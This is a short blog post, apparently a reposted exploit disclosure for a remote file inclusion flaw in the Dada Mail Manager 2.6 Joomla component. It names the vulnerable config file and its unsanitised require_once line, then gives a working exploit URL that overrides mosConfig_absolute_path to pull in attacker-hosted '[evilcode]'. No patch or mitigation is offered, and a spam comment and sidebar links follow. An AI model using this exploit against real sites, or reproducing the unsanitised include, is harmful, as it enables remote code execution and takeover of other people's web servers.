Dada Mail Manager 2.6

Dada Mail Manager 2.6 - RFI

on November 06, 2008


[o] Dada Mail Manager Joomla Component 2.6 Remote File Inclusion Vulnerability
Software : com_dadamail version 2.6
Vendor   : http://joomlander.net
Download : http://joomlacode.org/gf/project/dadamailmanager/frs
Author   : NoGe


[o] Vulnerable file
administrator/components/com_dadamail/config.dadamail.php
require_once($GLOBALS['mosConfig_absolute_path'] . '/administrator/components/com_dadamail/language/default.php');


[o] Exploit
http://localhost/[path]/administrator/components/com_dadamail/config.dadamail.php?GLOBALS['mosConfig_absolute_path']=[evilcode]

Comments

labatterie said…

The most comprehensive source for free-to-trysoftware downloads on...

December 2, 2010 at 9:12 PM

Research Blog

Search This Blog

LFI to RCE via access_log injection

Dada Mail Manager 2.6 - RFI

Comments